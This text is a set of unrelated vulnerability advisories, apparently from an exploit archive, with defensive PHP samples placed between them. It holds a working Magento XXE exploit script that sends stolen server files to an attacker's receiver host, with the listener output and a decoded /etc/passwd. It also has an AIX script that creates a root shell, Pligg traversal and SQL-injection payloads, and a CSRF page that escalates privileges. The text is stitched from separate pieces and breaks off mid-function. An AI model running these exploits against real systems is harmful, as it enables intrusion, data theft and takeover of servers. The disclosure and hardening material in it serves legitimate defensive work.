In short, the Zend Framework XXE vulnerability stems from an insufficient 
sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP 
applications. 
By using certain multibyte encodings within XML, it is possible to bypass 
the sanitisation and perform certain XXE attacks.

Since eBay Magento is based on Zend Framework and uses several of its XML
classes, it also inherits this XXE vulnerability.

The vulnerability in Zend affects all of its XML components; however, there 
are two vulnerable Zend Framework components:

 - Zend_XmlRpc_Server 
 - Zend_SOAP_Server 

that are of special interest to attackers as they could be exploited remotely 
without any authentication. 

Magento implements a store API providing XML/SOAP web services. 
Although Zend_XmlRpc is present within the Magento code base, testing 
revealed that an older Zend class, which is not vulnerable, was used for its
implementation.

However, further testing revealed that Magento SOAP API was implemented using
the Zend_SOAP_Server class from Zend Framework, which is vulnerable to the 
XXE injection vulnerability discovered earlier.

 
V. PROOF OF CONCEPT
-------------------------
 
Normally, when an XML document containing entities is supplied to the Magento
SOAP API, the following message is produced:

<SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Sender</faultcode>
<faultstring>Detected use of ENTITY in XML, disabled to prevent XXE/XEE 
attacks</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope> 

Below is a POC exploit that automates the steps necessary to bypass this
protection on Magento served with PHP-FPM, and remotely exploit the XXE issue 
in Magento's SOAP API without authentication.
Authentication is not required for the exploitation, as Magento first needs to
load the malicious XML data in order to read the credentials within the SOAP 
login method. Loading the malicious XML may be enough to trigger the attacker's
payload within the entities (where the libxml2 library auto-expands entities).
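The following is an added example, not code from Magento or Zend Framework: it shows why a byte-level scan for ENTITY misses the same payload once it is encoded as UTF-16, and a loader that normalises the encoding before the check and still refuses the document if libxml records a DOCTYPE. It assumes PHP with the mbstring and dom extensions; the function names are the example's own.

```php
<?php
// Added example, not code from Magento or Zend Framework. It contrasts a
// byte-level ENTITY check, which a UTF-16 body bypasses, with a loader that
// normalises the body to UTF-8 before checking and still refuses a DOCTYPE
// after parsing. Requires the mbstring and dom extensions.
declare(strict_types=1);

// A check of the kind the advisory describes as bypassed: it scans raw bytes,
// but a UTF-16 body interleaves a NUL byte with every ASCII character, so the
// literal "<!ENTITY" never matches.
function naiveHasEntity(string $raw): bool
{
    return preg_match('/<!(?:ENTITY|DOCTYPE)/i', $raw) === 1;
}

// libxml2 honours a byte-order mark, or the NUL pattern of a BOM-less UTF-16
// document, so the check must recognise the same encodings the parser does.
function detectXmlEncoding(string $raw): string
{
    if (strncmp($raw, "\x00\x00\xFE\xFF", 4) === 0) return 'UTF-32BE';
    if (strncmp($raw, "\xFF\xFE\x00\x00", 4) === 0) return 'UTF-32LE';
    if (strncmp($raw, "\xFE\xFF", 2) === 0) return 'UTF-16BE';
    if (strncmp($raw, "\xFF\xFE", 2) === 0) return 'UTF-16LE';
    if (strncmp($raw, "<\x00", 2) === 0) return 'UTF-16LE';   // no BOM
    if (strncmp($raw, "\x00<", 2) === 0) return 'UTF-16BE';   // no BOM
    return 'UTF-8';
}

function loadXmlWithoutEntities(string $raw): DOMDocument
{
    $enc = detectXmlEncoding($raw);
    $xml = $enc === 'UTF-8' ? $raw : mb_convert_encoding($raw, 'UTF-8', $enc);
    // Drop a (converted) BOM and the declaration's encoding attribute so that
    // libxml parses the now UTF-8 text as UTF-8.
    if (strncmp($xml, "\xEF\xBB\xBF", 3) === 0) {
        $xml = substr($xml, 3);
    }
    $xml = preg_replace('/^(<\?xml[^>]*?)\s+encoding\s*=\s*(["\'])[^"\']*\2/i', '$1', $xml, 1);

    // 1. The textual check, now run on normalised bytes.
    if (naiveHasEntity($xml)) {
        throw new InvalidArgumentException('Detected use of ENTITY/DOCTYPE in XML');
    }
    // 2. Parser hardening: no network access and no external entity loader
    //    (disabled by default since PHP 8.0). Never pass LIBXML_NOENT or
    //    LIBXML_DTDLOAD here.
    if (PHP_VERSION_ID < 80000) {
        $loaderWasDisabled = libxml_disable_entity_loader(true);
    }
    $internalErrors = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($internalErrors);
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader($loaderWasDisabled);
    }
    // 3. Post-parse check: refuse whatever libxml still recorded as a DOCTYPE.
    if ($ok === false || $dom->doctype !== null) {
        throw new InvalidArgumentException('Rejected malformed XML or XML with DOCTYPE');
    }
    return $dom;
}

// Constructed sample: the advisory's test payload re-encoded to UTF-16 with a
// BOM, which is what its "iconv -t UTF-16" step produces on x86 systems.
$payload = '<?xml version="1.0" encoding="UTF-16"?>'
    . '<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "file:///dev/random"> %xxe; ]>'
    . '<root/>';
$utf16 = "\xFF\xFE" . mb_convert_encoding($payload, 'UTF-16LE', 'UTF-8');

var_dump(naiveHasEntity($payload));   // byte-level check on the UTF-8 form
var_dump(naiveHasEntity($utf16));     // byte-level check on the UTF-16 form
try {
    loadXmlWithoutEntities($utf16);   // the normalising loader on the UTF-16 form
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
$dom = loadXmlWithoutEntities('<?xml version="1.0"?><root><a>fine</a></root>');
echo $dom->documentElement->textContent, PHP_EOL;
```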


---[ magento-soap-exploit.sh ]---

#!/bin/bash
#
# POC Exploit (v1.1)
#
# eBay Magento CE  <= 1.9.2.1  XML eXternal Entity Injection (XXE) on PHP-FPM
# eBay Magento EE  <= 1.14.2.1
#
# CVE-2015-5161
#
# Credits:
#
# Dawid Golunski
# dawid (at) legalhackers.com
# http://legalhackers.com
#
# Advisories:
#
# http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt
# http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
#
# Usage:
#
# [Vulnerability test]
#
# This is to test the vulnerability with a simple XXE payload which retrieves the
# /dev/random file and causes a time out. No receiver server is required in this
# test as no data is returned.
#
# Run the script with just the URL to Magento SOAP API, with no other parameters. 
# E.g:
# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index
#
#
# [File retrieval from the remote server]
# 
# ./magento-soap-exploit.sh MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT
#
# E.g:
# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 192.168.10.5 80
#
# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to:
# http://192.168.10.5:80/fetch.php?D=[base64_string]
# You should have the receiver server/script listening on the specified port before running this exploit.
#

TIMEOUT=6
PAYLOAD_TMP_FILE="/tmp/payload-utf16.xml"

if [ $# -ne 1 ] && [ $# -ne 4 ] ; then 
	echo -e "\nUsage: \n"
	echo -e "[Vulnerability test]\n"
	echo -e "$0 MAGENTO_SOAP_API_URL"
	echo -e "E.g:"
	echo -e "$0 http://fpmserver/magento/index.php/api/soap/index\n";
	echo -e "[File retrieval]\n"
	echo -e "$0 MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT"
	echo -e "E.g:"
	echo -e "$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 192.168.5.6 80\n";
	exit 2;
else 
	TARGETURL="$1"
fi
if [ $# -eq 4 ]; then 
	FILE="$2"	
	RECEIVER_HOST="$3"
	RECEIVER_PORT="$4"
	TEST_ONLY=0
else
	TEST_ONLY=1
fi 

if [ $TEST_ONLY -eq 1 ]; then 
	# Vulnerability test 
	# Perform only a test by reading /dev/random file
	TEST_PAYLOAD_XML='<?xml version="1.0" encoding="UTF-16"?>
	<!DOCTYPE foo [  
	<!ELEMENT PoC ANY >
	<!ENTITY % xxe SYSTEM "file:///dev/random" >
		%xxe;
	]>'

	echo "$TEST_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
	echo -e "Target URL: $TARGETURL\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n"

	# Fetching /dev/random should cause the remote script to block
	# on reading /dev/random until the script times out.
	# If there is no delay it means the remote script is not vulnerable or 
	# /dev/random is not accessible.
	START=$(date +%s)
	wget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
	END=$(date +%s)
	DIFF=$(expr $END \- $START )

	if [ $DIFF -eq $TIMEOUT ]; then
		echo "Vulnerable. No response from Magento for $DIFF seconds :)"
		exit 0
	else 
		echo "Not vulnerable, or there is no /dev/random on the remote server ;)"
		exit 1
	fi
else 
	# File retrieval XXE payload
	SEND_DTD="<?xml version=\"1.0\" encoding=\"UTF-8\"?>
	<!ENTITY % all \"<!ENTITY &#37; send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\">
	%all;"
	SEND_DTD_B64="`echo "$SEND_DTD" | base64 -w0`"
	FILE_PAYLOAD_XML="<?xml version=\"1.0\" encoding=\"UTF-16\"?>
	<!DOCTYPE foo [  
	<!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=$FILE\">
	<!ENTITY % dtd SYSTEM \"data://text/plain;base64,$SEND_DTD_B64\">
	%dtd;

	%send;
	]>"

	# Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT
	echo "$FILE_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
	echo -e "Target URL: $TARGETURL\n\nInjecting XXE payload to retrieve the $FILE file..."
	echo -e "If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]\n"
	echo -e "If in doubt, try the vulnerability test option.\n"
	wget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
fi


--------------------------------

The above exploit uses an out-of-band XXE payload, which sends
any retrieved data back to the attacker even though the attacker cannot
see the resulting file in the server's response directly. 
This exploit also bypasses the LIBXML_NONET libxml setting imposed by the Zend 
Framework, which prohibits network access. This is achieved through the use of
the php://filter wrapper, which is treated as a local resource by the XML ENTITY 
handler even though it references remote resources. 

Successful exploitation in a test mode ('Vulnerability test', exploit run 
without parameters other than the URL to Magento SOAP API) will result in a 
time out and an internal server error caused by the XML ENTITY accessing 
/dev/random file which will block the API script. 

For example:

---

$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index
Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting Test XXE payload (/dev/random). Might take a few seconds.

--2015-05-19 22:14:17--  http://vulnhost/magento/index.php/api/soap/index
Resolving precise (vulnhost)... 127.0.0.1
Connecting to vulnhost (vulnhost)|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in 
headers. Giving up.

Vulnerable. No response from Magento for 6 seconds :)

---


Any file accessible to the PHP process can also be fetched with the 
above exploit by using the following syntax:

---

attacker$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index /etc/passwd attackershost 9090

Target URL: http://vulnhost/magento/index.php/api/soap/index
Injecting XXE payload to retrieve the /etc/passwd file... 

If successful, Base64 encoded result will be sent to http://attackershost:9090/fetch.php/D=[base64_result]
If in doubt, try the vulnerability test option.

--2015-05-19 22:33:06--  http://vulnhost/magento/index.php/api/soap/index
Resolving vulnhost (vulnhost)... 192.168.57.12
Connecting to vulnhost (vulnhost)|192.168.57.12|:80... connected.
HTTP request sent, awaiting response... Read error (Connection timed out) in 
headers. Giving up.

---

The result will be sent to the attacker's server listening on port 9090, which
needs to be set up before running the exploit:

---

attacker# nc -vv -l 9090

Listening on [0.0.0.0] (family 0, port 9090)
Connection from [192.168.57.12] port 9090 [tcp/*] accepted (family 2, sport 47227)
GET /fetch.php?D=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY[...cut...] HTTP/1.0
Host: attackershost:9090


attacker# echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY' | base64 -d

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]

---


It may also be possible to execute arbitrary commands on the remote server
if the remote PHP installation has the 'expect' module enabled.
In such case, an attacker could use expect:// wrapper within XML ENTITY
to execute any command in the context of the PHP process.
For example, by adding the XML entity of:

<!ENTITY % file SYSTEM "expect://id">

the attacker could execute the /usr/bin/id command on the remote Magento host.


VI. BUSINESS IMPACT
-------------------------

This issue should be marked as high/critical due to the wide deployment of 
eBay Magento software, low complexity of exploitation, as well as a possibility
of an unauthenticated remote exploitation as demonstrated in this advisory. 
If successful, an attacker could access sensitive files available to the
web server process, cause Denial Of Service, or even execute arbitrary commands
on the server with the permissions of the PHP/web process if certain PHP 
modules are installed.

There is also a growing number of servers set up to serve PHP code with 
PHP-FPM, especially in web hosting environments which need to respond to heavy
load.
There are official Magento tutorials explaining how to set up Magento with Nginx
and PHP FPM for best performance:

http://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf
 
VII. SYSTEMS AFFECTED
-------------------------

Versions of eBay Magento CE up to and including 1.9.2.1 can be exploited on a
web server using the PHP-FPM SAPI.
eBay Magento EE was not tested, but according to the vendor (see APPSEC-1045)
it is also affected by this issue, up to version EE 1.14.2.1.

To be exploitable, the system must have a version of the libxml library which 
expands XML entities without additional libxml2 settings. This is true for 
older versions, as well as newer versions of libxml2 with missing updates,
such as the fairly recent patch for CVE-2014-0191. 
For some distributions (see references below) libxml2 patches were released 
as late as April 2015, and for this reason there are likely many systems 
which still lack the libxml2 updates and allow the Magento/Zend 
vulnerability described in this advisory to be exploited.

The exploit, however, does not depend on the PHP version installed. In fact, the
exploit was confirmed to work on Fedora 21 with a recent (one-month-old) PHP 
version of:

PHP Version => 5.6.14
Build Date => Sep 30 2015 13:53:16

The issue can also be exploited on multiple web servers, as PHP-FPM can be set
up on popular web servers such as Apache, or Nginx on Linux/Unix, as well as 
Windows systems (as per the 'fpm on cygwin' setup guides available on the 
Internet).

 
VIII. SOLUTION
-------------------------

eBay Magento was informed about the issue and assigned it a reference ID of
APPSEC-1045. eBay released a patch bundle titled:

'SUPEE-6788 Patch Bundle'

prior to the release of this advisory. 
To address the vulnerability, the patch should be installed, or Magento should 
be upgraded to the latest version of 1.9.2.2 which already contains the fix.
 
IX. REFERENCES
-------------------------

http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt

http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt

http://framework.zend.com/security/advisory/ZF2015-06

Powering Magento with Ngnix and PHP-FPM:
http://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf

http://www.securiteam.com/

http://seclists.org/fulldisclosure/2015/Oct/105

Official eBay Magento website:
http://magento.com/

Patch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML 
Functionality Using Multibyte Payloads' (APPSEC-1045) is available at:

http://merch.docs.magento.com/ce/user_guide/magento/patch-releases-2015.html

CVE-2014-0191 :
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191
https://bugzilla.redhat.com/show_bug.cgi?id=1090976


X. DISCOVERED BY
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
 
XI. REVISION HISTORY
-------------------------

Oct 29th, 2015:  Advisory released

Nov 3rd,  2015:  Updated exploit to work on newer libxml2 versions such as 
                 2.9.1 without CVE-2014-0191 patch, updated 'Systems affected' 
                 section, plus minor updates in other sections
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
            
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  Directory Traversal
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

The editor delivered with Pligg CMS is vulnerable to directory traversal, which
gives an attacker that obtained admin credentials the opportunity to view any
file stored on the webserver that the webserver user has access to.

Please note that admin credentials are required.

3. Proof of Concept


POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1

the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been sent to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Directory-Traversal-81.html
            
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: - 
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;) 
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv

cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF

/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell
            
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of
them does not require any credentials, and allows the direct extraction of data
from the database.

3. SQL Injection

Description

Pligg CMS is vulnerable to SQL injection. It is possible to extract data from
all databases that the pligg database user has access to.

Credentials are not required.

Proof Of Concept


http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23

Code


/story.php:168
if(isset($_GET['reply']) && !empty($parent_comment_id)){
        $main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id']));
        $main_smarty->assign('parrent_comment_id',$parent_comment_id);
}
[...]
function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){
        Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments;

        //Set comment order to 1 if it's not set in the admin panel
        if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180);
        elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder'];

        if (!isset($CommentOrder)) $CommentOrder = 1;
        If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";}
        If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";}
        If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";}
        If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";}

[...]

        $comments = $db->get_results("SELECT *
        FROM " . table_comments . "
        WHERE (comment_status='published' $status_sql) AND
               comment_link_id=$link->id AND comment_id = $comment_id
        ORDER BY " . $CommentOrderBy);

4. Blind SQL Injection (Admin Area)

Description

There is a blind SQL Injection in the admin area of Pligg CMS. This allows an
attacker that gained admin credentials to extract data from the database.

The problem exists because the key of the submitted "enabled" POST array is
used in a query. The value is escaped, so quotes cannot be used in the
injection, but the code does not place the value between quotes, so in this
numeric context the escaping offers no protection.

Proof Of Concept


POST /pligg-cms-master/admin/admin_users.php HTTP/1.1

frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1

Code


// admin/admin_users.php
foreach($_POST["enabled"] as $id => $valuea)
{
        $_GET['id'] = $id = $db->escape($id);
        $user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id");

5. Possible SQL Injection

Description

The upload module is vulnerable to blind SQL injection via the "comment" and
"id" parameters.

The module seems to be unused at the moment, but if it were used in the
future, or if an attacker found a different way to execute it, it would be
vulnerable.

The requests to trigger the vulnerabilities would be:

POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23

POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1<script' or 1%3D1%23></script>&number=1&comment=1

Code


./modules/upload/upload.php:
if ($_POST['id'])
{
        $linkres=new Link;
        $linkres->id = sanitize($_POST['id'], 3);
        if(!is_numeric($linkres->id)) die("Wrong ID");
        if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number");
        if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files");

        // Remove old file and thumbnails with same number
        $sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'";

The first problem is that $_POST[comment] is never sanitized.

The second problem is that $_POST['id'] is first sanitized by removing tags,
then the result is checked for being numeric, and finally the original POST
value is used in the query. Because of this, it is possible to place the
injection inside tags to bypass the check.
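An added example, not Pligg's own code, that rewrites the three query patterns above so that every identifier is validated once and bound as a query parameter. It assumes PDO (an in-memory SQLite database for the self-contained run) in place of Pligg's $db wrapper, and the table names comments, users and files are placeholders for Pligg's table constants.

```php
<?php
// Added example, not Pligg's own code: the three query patterns from the
// advisory rewritten so that every identifier is validated once and bound
// as a parameter. Assumes PDO (SQLite in-memory below, for a self-contained
// run); the table names comments/users/files stand in for Pligg's
// table_comments, table_users and table_prefix."files".
declare(strict_types=1);

// Validate an identifier once and use that value everywhere afterwards. A
// value such as "1<script' or 1=1#></script>" or "2 AND IF(...)" is refused
// here instead of being escaped, tag-stripped, or checked on a copy.
function validateId($value, int $min = 1): ?int
{
    $id = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => $min]]);
    return $id === false ? null : $id;
}

// story.php: comment_id came straight from $_GET into the query.
function getComment(PDO $pdo, int $linkId, $rawCommentId): ?array
{
    $commentId = validateId($rawCommentId);
    if ($commentId === null) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM comments WHERE comment_status = ?'
        . ' AND comment_link_id = ? AND comment_id = ?');
    $stmt->execute(['published', $linkId, $commentId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// admin_users.php: the array key was escaped but interpolated unquoted, so
// escaping quotes changed nothing. Validate the key instead.
function loadSelectedUsers(PDO $pdo, array $enabledPost): array
{
    $stmt = $pdo->prepare('SELECT * FROM users WHERE user_id = ?');
    $users = [];
    foreach (array_keys($enabledPost) as $rawId) {
        $id = validateId($rawId);
        if ($id === null) {
            continue;   // e.g. the key "2 AND IF(...) #" from the advisory
        }
        $stmt->execute([$id]);
        if (($row = $stmt->fetch(PDO::FETCH_ASSOC)) !== false) {
            $users[$id] = $row;
        }
    }
    return $users;
}

// upload.php: a sanitised copy was checked but the original was used, and
// "comment" was never checked at all. Every value is validated and bound.
function findOldUpload(PDO $pdo, array $post, int $currentUserId, bool $isAdmin): ?array
{
    $linkId  = validateId($post['id'] ?? null);
    $number  = validateId($post['number'] ?? null);
    $comment = validateId($post['comment'] ?? null, 0);
    if ($linkId === null || $number === null || $comment === null) {
        return null;
    }
    $sql = 'SELECT * FROM files WHERE file_link_id = ? AND file_number = ? AND file_comment_id = ?';
    $params = [$linkId, $number, $comment];
    if (!$isAdmin) {                      // the owner restriction is bound too
        $sql .= ' AND file_user_id = ?';
        $params[] = $currentUserId;
    }
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-contained run against constructed data.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE comments (comment_id INTEGER, comment_link_id INTEGER, comment_status TEXT, comment_content TEXT)');
$pdo->exec('CREATE TABLE users (user_id INTEGER, user_login TEXT)');
$pdo->exec("INSERT INTO comments VALUES (1, 7, 'published', 'hello')");
$pdo->exec("INSERT INTO users VALUES (1, 'alice'), (2, 'bob')");
var_dump(getComment($pdo, 7, '1') !== null);
var_dump(getComment($pdo, 7, '1 union all select 1,1,1,1 from users #'));
var_dump(array_keys(loadSelectedUsers($pdo, ['1' => 'on', '2 AND IF(1=1,1,null) #' => 'on'])));
```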

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been sent to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Multiple-SQL-Injections-82.html
            
<!--
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt


Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:
================================
PHP Server Monitor 3.1.1


Vulnerability Type:
=================================
Privilege Escalation / CSRF


Vulnerability Details:
=====================

PHP Server Monitor uses level 20 for basic users and level 10 for administrators; these levels are stored in the database. A basic user can elevate their privileges to those of an administrator
by crafting an HTTP payload that changes their level to '10' and then getting an administrator to click an infected link or visit a malicious website, launching a
CSRF attack which grants the user admin access. This problem is due to the absence of any CSRF protection mechanism. 


Exploit code(s):
===============

1) privilege escalation / CSRF
-->

<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>

<form id="HELL" action="http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=3" method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="10">
<input type="text" name="password" value="">
<input type="text" name="password_repeat" value="">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>


</body>
</html>


<!--
Exploitation Technique:
=======================
Remote


Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure


Severity Level:
=========================================================
High


Description:
==========================================================


Request Method(s):              [+]  POST


Vulnerable Product:             [+]  PHP Server Monitor 3.1.1
  

===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx
-->
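An added example, not PHP Server Monitor's own code, showing a synchronizer-token check for the user save action that the forged form above posts to. It assumes PHP sessions; LEVEL_ADMIN/LEVEL_BASIC, handleUserSave() and the placeholder saveUser() are the example's own names, with the level values taken from the advisory.

```php
<?php
// Added example, not PHP Server Monitor's own code: a synchronizer token for
// the user "save" action the forged form above posts to. Assumes PHP sessions;
// the level values (10 admin, 20 basic) are the ones the advisory quotes, and
// saveUser() stands in for the application's real persistence call.
declare(strict_types=1);

const LEVEL_ADMIN = 10;
const LEVEL_BASIC = 20;

function csrfToken(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));   // per session, unguessable
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison against the session copy; an attacker's page
// cannot read the victim's session, so it cannot supply a matching token.
function csrfTokenIsValid($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

// Hidden field to add to the legitimate user edit form.
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Handler for ?mod=user&action=save. The forged form in the advisory carries
// no token, so it is rejected before any field, including "level", is read.
function handleUserSave(string $method, array $post, int $actingUserLevel): string
{
    if ($method !== 'POST') {
        return 'rejected: state changes require POST';
    }
    if (!csrfTokenIsValid($post['csrf_token'] ?? null)) {
        return 'rejected: missing or invalid CSRF token';
    }
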